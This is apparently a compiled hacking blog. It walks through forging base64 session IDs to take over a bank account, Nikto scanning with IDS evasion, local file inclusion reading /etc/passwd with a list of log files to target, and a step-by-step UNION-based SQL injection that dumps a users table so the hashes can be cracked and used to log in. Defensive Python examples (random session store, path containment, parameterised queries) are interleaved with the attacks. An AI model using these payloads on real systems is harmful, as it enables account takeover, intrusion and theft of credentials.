Breaking The sessions

The site has moved to the root domain, where all posts have been imported. Please go to http://pusheax.com/

Sessions are important for security. If an attacker can break the session/cookie of an active user, he or she can access that account as the user without any password. Some attackers don't care about this, maybe because they don't know much about it or find it boring. But how does a serious hacker take advantage? Do they just want to get the password easily, or through a simple SQL injection? No. A serious hacker looks for a hint (a simple vulnerability plus free, simple tools) that lets him go further. Anyway, I will explain only a little about breaking sessions, because you need to research it yourself to learn something good.

When we deal with sessions:

We deal with sessions whenever we register on a website, log in, transfer data, etc. The session is active until we log out. If the site did not manage sessions for an active account, we would need to log in every second.
When the user logs in, the website saves the session for the next visit (a cookie?). What about when we see "Keep me logged in always on this site"? Even if you browse the site 3 days later, you will still be logged in without entering a username and password. So when we log in to a website for the first time, the site will:

1. Set a cookie = dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7

2. Session = dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7

So I think you now know how a "session" works.

If the session is compromised by someone, he/she can use it to log in as the user without any password.

How a hacker can break sessions:

There are several ways of breaking sessions. Developers often make mistakes when managing sessions. The most common vulnerabilities are:

1. Time based.
2. Meaningful.
3. Predictable.

Just for understanding, I am explaining the "meaningful session" vulnerability.

Suppose we logged in to our bank "www.bank.com" with the username "exploit" and the password "SecUritYY". After logging in to the site, we see that the URL in the address bar looks like:

http://www.bank.com/accounts/hacker/test/index.php?phpsessionid=dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7
This URL looks really suspicious: it is using a base64 value as the session ID. If we decode the base64 value, we get:

user=exploit;email=sec@domain.com;ip=1.1.1.1;

We see some juicy information, but not the password. Still, we can use this session to attack other accounts. How?

If we know a valid username, email, and IP (this may require some social engineering), we can make a new session to break into the target account. For example, our victim's information (I got some information by SE):

user: dollar
email: giveme@victime.org
ip: 1.1.1.2 (Lol This fool clicked on a link)

Now we can encode this information as base64 and edit our cookie, or submit it directly in the URL bar (because it uses the GET method). I really hope that once you are logged in you transfer some $$$ to your account? 😉

Hope you understand something about attacking the session…
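The "meaningful session" weakness described above, next to the design that removes it. This is an added example, not code from the original post: the token and field layout are the ones shown in the article, while `SessionStore` and its method names are hypothetical.

```python
import base64
import secrets
import time

# Token copied from the article: base64 of "user=...;email=...;ip=...;"
ARTICLE_TOKEN = "dXNlcj1leHBsb2l0O2VtYWlsPXNlY0Bkb21haW4uY29tO2lwPTEuMS4xLjE7"


def parse_meaningful_token(token):
    """Decode a token whose content *is* the identity (the weak design)."""
    raw = base64.b64decode(token).decode("utf-8")
    fields = {}
    for part in raw.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key] = value
    return fields


def encode_fields(fields):
    """base64 is an encoding, not a secret: any client can produce this."""
    raw = "".join("%s=%s;" % (k, v) for k, v in fields.items())
    return base64.b64encode(raw.encode("utf-8")).decode("ascii")


def weak_lookup(token):
    """Weak server: acts as whichever user the client-supplied token names."""
    return parse_meaningful_token(token).get("user")


class SessionStore:
    """Hardened design: the ID is random and carries no meaning.
    Identity and expiry live only on the server side."""

    def __init__(self, ttl_seconds=1800):
        self._sessions = {}
        self._ttl = ttl_seconds

    def create(self, user, now=None):
        now = time.time() if now is None else now
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": user, "expires": now + self._ttl}
        return sid

    def lookup(self, sid, now=None):
        now = time.time() if now is None else now
        entry = self._sessions.get(sid)
        if entry is None:
            return None  # unknown ID: nothing the client sends can mint one
        if entry["expires"] <= now:
            del self._sessions[sid]  # expired sessions are dropped
            return None
        return entry["user"]

    def destroy(self, sid):
        """Call on logout so a leaked ID stops working."""
        self._sessions.pop(sid, None)


def demo():
    # The victim fields are the constructed ones used in the article.
    client_made = encode_fields(
        {"user": "dollar", "email": "giveme@victime.org", "ip": "1.1.1.2"}
    )
    store = SessionStore()
    real_sid = store.create("exploit", now=0)
    return {
        "weak_accepts_client_made": weak_lookup(client_made),
        "store_accepts_client_made": store.lookup(client_made, now=10),
        "store_accepts_real": store.lookup(real_sid, now=10),
        "store_after_expiry": store.lookup(real_sid, now=1801),
    }


if __name__ == "__main__":
    print(parse_meaningful_token(ARTICLE_TOKEN))
    print(demo())
```

The session ID should also travel in a cookie marked Secure and HttpOnly rather than in the URL, where it ends up in logs, browser history and Referer headers.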

Special note: You should research seriously, otherwise you will not learn anything from a ready-made tutorial (such as a free tutorial). You should find the way from a very simple hint. Don't think anyone will do everything for you. Just remember, self help is the best help (you just need hints sometimes?).

If you find any mistakes/errors, please feel free to contact me (I love to fix myself).

Good Luck guys!!!

My favorite websites, which may help you a lot in learning computer exploitation and hacking

1. Exploit Writing:

I love this site. It has a lot of information and tutorials. If you are interested in writing exploits, go to corelan. There are currently 11 exploit writing tutorials, ranging from basic to advanced, and they are even better than other commercial courses.

Thanks, Peter (respect)

2. Vulnerability Research:

If you are serious then you need these sites. We always need to search for new/old vulnerabilities, so these sites are very good for getting started:

2.1. Exploit-db
2.2. securityfocus
2.3. osvdb.org
2.4. web.nvd.nist.gov

3. Metasploit:

Metasploit is a popular framework for pentesting. Metasploit is very useful for quick shellcoding.

Nikto web vulnerability scanner.

Most of the time I use Nikto for scanning target websites. It is easy but really powerful. Sometimes it sucks too, because of false positives. I will just show how to scan your own site. It scans for CGI and default files and directories.

Warning: Don't do anything illegal. I am just sharing how I practice. If you are a black hat hacker and are going to attack a third-party website, or do anything illegal, then I am not responsible for that…

I believe sharing knowledge means increasing knowledge.

Nikto is a Perl script, so we need to install Perl to run it (be aware, Windows users). If you don't have this tool yet, go and download it:
http://cirt.net/nikto2 . It is installed by default in BackTrack.

Simply:

root@bt:cd /pentest/web/nikto

root@bt:/pentest/web/nikto# ./nikto.pl -Help

   Options:
       -ask+               Whether to ask about submitting updates
                               yes   Ask about each (default)
                               no    Don’t ask, don’t send
                               auto  Don’t ask, just send
       -Cgidirs+           Scan these CGI dirs: “none”, “all”, or values like “/cgi/ /cgi-a/”
       -config+            Use this config file
       -Display+           Turn on/off display outputs:
                               1     Show redirects
                               2     Show cookies received
                               3     Show all 200/OK responses
                               4     Show URLs which require authentication
                               D     Debug output
                               E     Display all HTTP errors
                               P     Print progress to STDOUT
                               S     Scrub output of IPs and hostnames
                               V     Verbose output
       -dbcheck           Check database and other key files for syntax errors
       -evasion+          Encoding technique:
                               1     Random URI encoding (non-UTF8)
                               2     Directory self-reference (/./)
                               3     Premature URL ending
                               4     Prepend long random string
                               5     Fake parameter
                               6     TAB as request spacer
                               7     Change the case of the URL
                               8     Use Windows directory separator (\)
                               A     Use a carriage return (0x0d) as a request spacer
                               B     Use binary value 0x0b as a request spacer
        -Format+           Save file (-o) format:
                               csv   Comma-separated-value
                               htm   HTML Format
                               msf+  Log to Metasploit
                               nbe   Nessus NBE format
                               txt   Plain text
                               xml   XML Format
                               (if not specified the format will be taken from the file extension passed to -output)
       -Help              Extended help information
       -host+             Target host
       -IgnoreCode        Ignore Codes–treat as negative responses
       -id+               Host authentication to use, format is id:pass or id:pass:realm
       -key+              Client certificate key file
       -list-plugins      List all available plugins, perform no testing
       -maxtime+          Maximum testing time per host
       -mutate+           Guess additional file names:
                               1     Test all files with all root directories
                               2     Guess for password file names
                               3     Enumerate user names via Apache (/~user type requests)
                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                               6     Attempt to guess directory names from the supplied dictionary file
       -mutate-options    Provide information for mutates
       -nocache           Disables the response cache
       -nointeractive     Disables interactive features
       -nolookup          Disables DNS lookups
       -nossl             Disables the use of SSL
       -no404             Disables nikto attempting to guess a 404 page
       -output+           Write output to this file
       -Pause+            Pause between tests (seconds, integer or float)
       -Plugins+          List of plugins to run (default: ALL)
       -port+             Port to use (default 80)
       -RSAcert+          Client certificate file
       -root+             Prepend root value to all requests, format is /directory
       -Single            Single request mode
       -ssl               Force ssl mode on port
       -Tuning+           Scan tuning:
                               1     Interesting File / Seen in logs
                               2     Misconfiguration / Default File
                               3     Information Disclosure
                               4     Injection (XSS/Script/HTML)
                               5     Remote File Retrieval – Inside Web Root
                               6     Denial of Service
                               7     Remote File Retrieval – Server Wide
                               8     Command Execution / Remote Shell
                               9     SQL Injection
                               0     File Upload
                               a     Authentication Bypass
                               b     Software Identification
                               c     Remote Source Inclusion
                               x     Reverse Tuning Options (i.e., include all except specified)
       -timeout+          Timeout for requests (default 10 seconds)
       -Userdbs           Load only user databases, not the standard databases
                               all   Disable standard dbs and load only user dbs
                               tests Disable only db_tests and load udb_tests
       -until             Run until the specified time or duration
       -update            Update databases and plugins from CIRT.net
       -useproxy          Use the proxy defined in nikto.conf
       -Version           Print plugin and database versions
       -vhost+            Virtual host (for Host header)
                + requires a value

If we run ./nikto.pl -Help or perl nikto.pl -Help, we get the details of all the options.

We are simply going to scan our own company's website, because we are pentesting it. So easy:

root@bt:/pentest/web/nikto# ./nikto.pl -h target.com

I tested it on my localhost to paste here. This is the output/vulnerabilities we may get:

root@bt:/pentest/web/nikto# ./nikto.pl -h target.com
– Nikto v2.1.5
—————————————————————————
+ Target IP:          ip address
+ Target Hostname:    target.com
+ Target Port:        80
+ Start Time:         2012-01-21 13:48:22 (time formate)
—————————————————————————
+ Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
+ Retrieved x-powered-by header: PHP/5.2.17
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/1.0.0-fips appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
+ FrontPage – http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
+ mod_ssl/2.2.21 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm — a DoS was not attempted.
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
+ Default account found for ‘Secured Frontpage on PennyStockAdvice.com’ at /_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals (ID ”, PW ‘_Cisco’). Cisco device.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/mchat.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /cgi-sys/scgiwrap: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3092: /stats/: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3268: /_vti_bin/: Directory indexing found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: : Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ OSVDB-3092: /as/: This might be interesting… potential country code (American Samoa)
+ OSVDB-3092: /ms/: This might be interesting… potential country code (Montserrat)
+ 6474 items checked: 3 error(s) and 32 item(s) reported on remote host
+ End Time:           2012-01-21 13:58:55 (Time formate) (4233 seconds)
—————————————————————————
+ 1 host(s) tested

As you can see, Nikto found many things. Nikto is very effective for finding default files and directories.

Note: you have to understand the output of tools, otherwise you can do nothing.
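One way to start making sense of a report like the one above when it comes from a scan of your own site: parse each "+" line into reference, path and message, then sort the findings so the ones to fix first come out on top. This is an added example, not part of the original post or of Nikto itself. The sample lines are a subset of the output above, and the category names and priorities are assumptions chosen for illustration.

```python
import re
from collections import Counter

# Constructed sample: a subset of the scan output shown above.
SAMPLE = """\
- Nikto v2.1.5
+ Target Hostname:    target.com
+ Target Port:        80
+ Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0-fips
+ Retrieved x-powered-by header: PHP/5.2.17
+ OpenSSL/1.0.0-fips appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /~root/: Directory indexing found.
+ /cgi-sys/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ OSVDB-3092: /cgi-sys/mchat.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3092: /stats/: This might be interesting...
+ 6474 items checked: 3 error(s) and 32 item(s) reported on remote host
+ 1 host(s) tested
"""

# "+ [OSVDB-n: ][/path: ]message"
FINDING = re.compile(r"^\+ (?:(OSVDB-\d+): )?(?:(/\S*): )?(.+)$")
# Scan metadata lines that also start with "+" but are not findings.
META = re.compile(r"^(Target |Start Time|End Time|\d+ (items|host))")

# (category, priority, pattern); priority 1 is handled first. Assumed rules.
RULES = [
    ("command-execution", 1, re.compile(r"execute .*commands", re.I)),
    ("outdated-software", 2, re.compile(r"appears to be outdated", re.I)),
    ("directory-listing", 2, re.compile(r"directory indexing|allowed to browse", re.I)),
    ("risky-http-method", 3, re.compile(r"\b(TRACE|DEBUG)\b")),
    ("version-disclosure", 3, re.compile(r"^Server:|x-powered-by", re.I)),
    ("default-content", 3, re.compile(r"^Default ", re.I)),
]


def parse_findings(text):
    """Return findings as dicts, sorted by priority and then path."""
    findings = []
    for line in text.splitlines():
        match = FINDING.match(line.strip())
        if not match:
            continue  # banner and separator lines
        ref, path, message = match.groups()
        message = message.lstrip(": ").strip()
        if META.match(message):
            continue
        category, priority = "needs-manual-review", 4
        for name, prio, pattern in RULES:
            if pattern.search(message):
                category, priority = name, prio
                break
        findings.append({
            "ref": ref, "path": path, "message": message,
            "category": category, "priority": priority,
        })
    return sorted(findings, key=lambda f: (f["priority"], f["path"] or ""))


def count_by_category(findings):
    return dict(Counter(f["category"] for f in findings))


if __name__ == "__main__":
    for f in parse_findings(SAMPLE):
        print(f["priority"], f["category"], f["path"] or "-", f["ref"] or "-")
```

Every entry still needs checking by hand, since the tool reports false positives, as noted above.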

We can use various options (see help). For example, a command:

root@bt:/pentest/web/nikto# ./nikto.pl -host target.com -root /admin -port 443 -evasion 1

How does this work? Simple:
-host = -h (the target site)
-root = send all requests to the /admin directory
-port = The site is not running on the default port 80; I know it is running on 443.
-evasion = IDS evasion. Evasion 1 (Random URI encoding (non-UTF8))

I hope you got some idea about it… Just try to believe that people do not need hacking training to learn to use tools.

If you have a skid mindset, tools may not help you. Be aware of that before using tools.

For more information, visit http://cirt.net/nikto2

Good Luck!!!

Exploiting Local File Inclusion vulnerability (LFI)

Local File Inclusion means loading a local file such as /etc/passwd or /etc/hosts in a PHP web page. Many programming mistakes can cause this vulnerability. It occurs when a programmer misuses one of the following in a PHP page:

include
include_once
require
require_once
fopen

For example, suppose a page contains:

<?php
// Deliberately vulnerable: the request parameter goes straight into include().
$vulnerable = $_GET['vulnerable'];
include($vulnerable); // this may also be require, require_once, fopen, etc.
?>

This code is vulnerable to Local File Inclusion.

Suppose our target URL is www.n00bprogammer.com/vulnerable/

If you submit this URL directly in the browser address bar, you get a web page. That means there is a file "index.php".

If we try:

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd

And it outputs:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false

That means it worked. But modern Unix-like systems no longer include the hashes in /etc/passwd (all hashes are in /etc/shadow). So without permission, you can't read the /etc/shadow file.
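Why the two-level path above failed while the four-level one reached /etc/passwd, and two ways to close the hole. This is an added example, not code from the original post. It assumes the document root is /var/www (so index.php lives in /var/www/vulnerable), and the page names in `PAGES` are hypothetical. Path handling is modelled with `posixpath` so it runs anywhere; a real application should also resolve symlinks (for example with realpath) before the containment check.

```python
import posixpath

DOCROOT = "/var/www"                  # assumption: typical Apache docroot
SCRIPT_DIR = DOCROOT + "/vulnerable"  # directory that holds index.php


def resolve_like_include(param, script_dir=SCRIPT_DIR):
    """Model of where a relative include() path ends up on disk."""
    return posixpath.normpath(posixpath.join(script_dir, param))


# Fix 1: the request never supplies a path, only a key into a fixed map.
PAGES = {  # hypothetical page names
    "home": "pages/home.php",
    "contact": "pages/contact.php",
}


def allowlisted_path(param, base_dir=SCRIPT_DIR):
    """Return the file for a known page name, or raise ValueError."""
    relative = PAGES.get(param)
    if relative is None:
        raise ValueError("unknown page")
    return posixpath.join(base_dir, relative)


# Fix 2: when names must be dynamic, resolve first and then require that
# the result is still inside the directory meant to be served.
def contained_path(param, base_dir=SCRIPT_DIR):
    """Return the resolved path if it stays under base_dir, else raise."""
    if "\x00" in param:
        raise ValueError("NUL byte in path")
    full = posixpath.normpath(posixpath.join(base_dir, param))
    # commonpath compares whole components, so /var/www/vulnerable2
    # is not mistaken for a child of /var/www/vulnerable.
    if posixpath.commonpath([full, base_dir]) != base_dir:
        raise ValueError("path escapes base directory")
    return full


def is_rejected(func, value):
    """True when func refuses value."""
    try:
        func(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Two levels up only reaches /var, where no etc/passwd exists.
    print(resolve_like_include("../../etc/passwd"))
    # Extra ".." segments are clamped at "/", so this lands on the real file.
    print(resolve_like_include("../../../../etc/passwd"))
    print(allowlisted_path("home"))
    print(is_rejected(contained_path, "../../../../etc/passwd"))
```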

There are many files you may be interested in reading:

/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log

Many sites have an unnecessary URL variable whose value is a file name with an extension. They use a PHP, image, or ASP file as the value. This is not secure at all. For example:

www.target.site/vulnerable.php?=image.jpeg

This may also be vulnerable to LFI... Try.

Advanced hackers can go deeper, such as:

1. There are some special ways of attacking the application tier to root the system (hint: overwriting error_log).
2. Reading more advanced files (hint: SQL).

Try them, research and learn...
 
Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion 

Let me know if you have any questions, please...


SQL injection explained

Today I will explain SQL injection. Input-based attacks are the most effective for testing web security, and SQL injection is the most popular for web hacking. No waiting, let's start (hey, I am not going to explain what SQL injection is; this is how to exploit it).

Testing if the target is vulnerable:

Suppose the target site is http://www.victim.com. We can quickly gather some information with Google to find some parameter-based URLs. Simply go to Google and search like:

site:www.victim.com filetype:php

(Note: I assume you have already gathered some information about the site, so you know what file extension it uses. If you are attacking randomly then go away from here.)

Then we see many results like:
www.victim.com/index.php

www.victim.com/something.php?id=3

etc

Simply browse to www.victim.com/something.php?id=3 and add one more thing. Example:

www.victim.com/something.php?id=3

If the site is vulnerable, we will see an SQL error like:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” AND products.obsolete=’N” at line 1

If we see this error on the page, we have confirmed that the site is vulnerable and exploitable.

Next ATTACK

Finding the number of columns:

First we check how many columns are available with an "ORDER BY" query. If we go past the number of available columns, we get the error "Unknown Column".

No error:

www.victim.com/something.php?id=3 ORDER BY 4--

No error:

www.victim.com/something.php?id=3 ORDER BY 5--

Error:

www.victim.com/something.php?id=3 ORDER BY 6--

Now we have confirmed that it has 6 columns. If you get no error, try more columns: 7, 8, 9, etc.

How to find the vulnerable column

To find the vulnerable columns we need the "UNION SELECT" command. So:

www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,5,6--

Now we will see one or more of the numbers 1-6 on the page. Suppose we see "5".

So now we know that column number 5 is vulnerable.

Checking the MySQL version:

www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,@@version,6--

We know the MySQL version is 5 (version 4 won't work).

Great! Now we quickly need their users database dump. So quick!!!

Now we need all the table names.

Getting table names:

www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=database()--

So we get several table names. For example, we get:

links
pages
tokens
visitor
creditcard
users
transaction
etc…

We want to log in as a powerful user so that we can edit their pages. To do this, we first need to find the column names:

Getting column names:

www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name='users'--

So from this query we get output like:

id
username
email
firstname
lastname
password
link

It is easy to understand that we need the username and password columns to get admin access:

Grabbing the username and password:

www.victim.com/something.php?id=-3 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6 from users--

So you get all usernames and passwords as output, like:

admin:akde3d09kd4ur489deqa9094ldad48dkr
super:54ee3d09kd4ur489deqa9094ldad4u78l

Now crack the hash and then log in with the username "admin" or "super" and the plain text (cracked) password.

If you don't know how to crack hashes, check out other articles…

There are many SQL injection techniques, but I explained a very common one here. So try more, research and research.
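The root cause behind every step above is that the id value is pasted into the SQL text, and that database errors are shown to the visitor. The vulnerable pattern and its fix side by side, as an added example that is not part of the original post: it uses Python's built-in sqlite3 instead of MySQL so it runs offline, and the table contents and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """In-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products VALUES (3, 'widget', 9.5);
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return db


def vulnerable_page(db, raw_id):
    """'Before': the request value becomes part of the SQL statement and
    the database error text is returned to the client."""
    sql = "SELECT id, name, price FROM products WHERE id = " + raw_id
    try:
        return 200, db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, str(exc)  # leaks query structure to the visitor


def hardened_page(db, raw_id):
    """'After': validate the type, bind the value, keep errors private."""
    # An id is a short run of ASCII digits; anything else is rejected early.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        return 400, "invalid id"
    try:
        rows = db.execute(
            "SELECT id, name, price FROM products WHERE id = ?",
            (int(raw_id),),  # bound as data, never parsed as SQL
        ).fetchall()
    except sqlite3.Error:
        # Log the detail server-side; the client gets nothing to probe with.
        return 500, "internal error"
    return 200, rows


def bound_only(db, raw_id):
    """Binding alone already neutralises the input: the whole string is
    compared to the id column as one value, so no row matches."""
    return db.execute(
        "SELECT id, name, price FROM products WHERE id = ?", (raw_id,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    union = "-3 UNION SELECT id, username, password FROM users"
    for value in ("3", "3 ORDER BY 4", union):
        print(repr(value))
        print("  vulnerable:", vulnerable_page(db, value))
        print("  hardened:  ", hardened_page(db, value))
```

The database account used by the web application should also have no rights on tables it does not need, which limits what any remaining injection point can read.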

There are probably some mistakes I made… If you catch them, feel free to contact me.

Good Luck!!!

DNS Enumeration

Today I will show you how to enumerate DNS using various tools. These are freely downloadable from the Internet. Every penetration tester knows that by enumerating DNS it is possible to get some important public (and sometimes private) information such as server names, server IP addresses, sub-domains, etc. Anyway, let's use some tools.

Tool-1 : dnsenum.pl

Download here: http://code.google.com/p/dnsenum/downloads/detail?name=dnsenum-1.2.2.tar.gz&can=2&q= 

1. Simply open a terminal and cd to the dnsenum path (cd /pentest/enumeration/dns/dnsenum). If you enter the simple command "./dnsenum.pl", you will get all the options you can use:

So we can simply use this command to enumerate: ./dnsenum.pl target.com
I ran it against google just to take a screenshot:

Screen shot2:

dnsenum output some valuable information. But at the end it said "brute force file not specified, bay." This means that it can take a wordlist for brute forcing all the sub-domains.

So you just need to do: root@pentest: ./dnsenum.pl -f /your/path/of/dictionary.lst target.com

Just read the output of any tool and try to understand it. You will find that you can fix any simple problem yourself. Actually, to learn to use tools you don't need any teacher.

Another tool: fierce.pl
Simply run:

root@pentest: fierce.pl -dns target.net

This tool is also capable of taking a wordlist for brute forcing:
root@pentest: ./fierce.pl -dns target.net -wordlist /path/word.txt

You can also use nslookup:

rbage@pentest:~$ nslookup
> google.com
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
Name:   google.com
Address: 74.125.235.17
Name:   google.com
Address: 74.125.235.19
Name:   google.com
Address: 74.125.235.20
Name:   google.com
Address: 74.125.235.16
Name:   google.com
Address: 74.125.235.18
> set type=mx
> google.com
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
google.com      mail exchanger = 50 alt4.aspmx.l.google.com.
google.com      mail exchanger = 40 alt3.aspmx.l.google.com.
google.com      mail exchanger = 30 alt2.aspmx.l.google.com.
google.com      mail exchanger = 20 alt1.aspmx.l.google.com.
google.com      mail exchanger = 10 aspmx.l.google.com.

Authoritative answers can be found from:
> set type=ns
> google.com
Server:         192.168.1.1
Address:        192.168.1.1#53

Non-authoritative answer:
google.com      nameserver = ns4.google.com.
google.com      nameserver = ns1.google.com.
google.com      nameserver = ns2.google.com.
google.com      nameserver = ns3.google.com.

Authoritative answers can be found from:
>

There are many tools for enumerating DNS:
dnswalk: http://sourceforge.net/projects/dnswalk/
host: It is built into Linux
dnsmap: http://code.google.com/p/dnsmap/
etc.

Try them…

Web Hacking tools

You can get the full list of hacking tools from Here

Burp suite
Download : http://portswigger.net/burp/download.html

Owasp-zap
Download: http://code.google.com/p/zaproxy/downloads/list

DirBuster
Download: https://sourceforge.net/projects/dirbuster/

Acunetix
Download: http://www.acunetix.com/vulnerability-scanner/download.htm

w3af
Download: http://www.w3af.sourceforge.net

Nikto 
Download: http://www.cirt.net/nikto2 

Sqlmap 
Download: http://sqlmap.sourceforge.net

Tamper Data
Download: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ 

Live HTTP Header 
Download: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

Cookie Monster 
Download: https://addons.mozilla.org/en-US/firefox/addon/cookie-monster/

Hackbar 
Download: https://addons.mozilla.org/en-US/firefox/addon/hackbar/

Hydra 
Download: http://thc.org/thc-hydra/ 

These are the most important tools for attacking websites (I think these are enough). If you want to work only with tools, there are lots of tools freely downloadable. Visit: HERE



Gathering Information before hacking website.

Before attacking (pentesting) a website we must gather some important information and then map the attack surface. If we don't understand how the site works, what is available on the site, what type of input it takes, etc., we will not be able to make a good attack (attacks rarely succeed without information gathering first). Many skids around us just start looking for SQL injection or start brute forcing the web form, and in the end fail.
Gathering information and mapping the site is very, very important, so I will explain (not in much detail) how to do it, what to look for, etc.

Spidering the web:

Basically I look for links, web forms, source code, directories, etc.
There are many tools to spider a target website, but I prefer proxy tools such as Burp Suite and OWASP ZAP, and the downloader wget.

We may find a lot of important information by spidering the target.

Screenshot of Burp Suite:

burp suite spidering

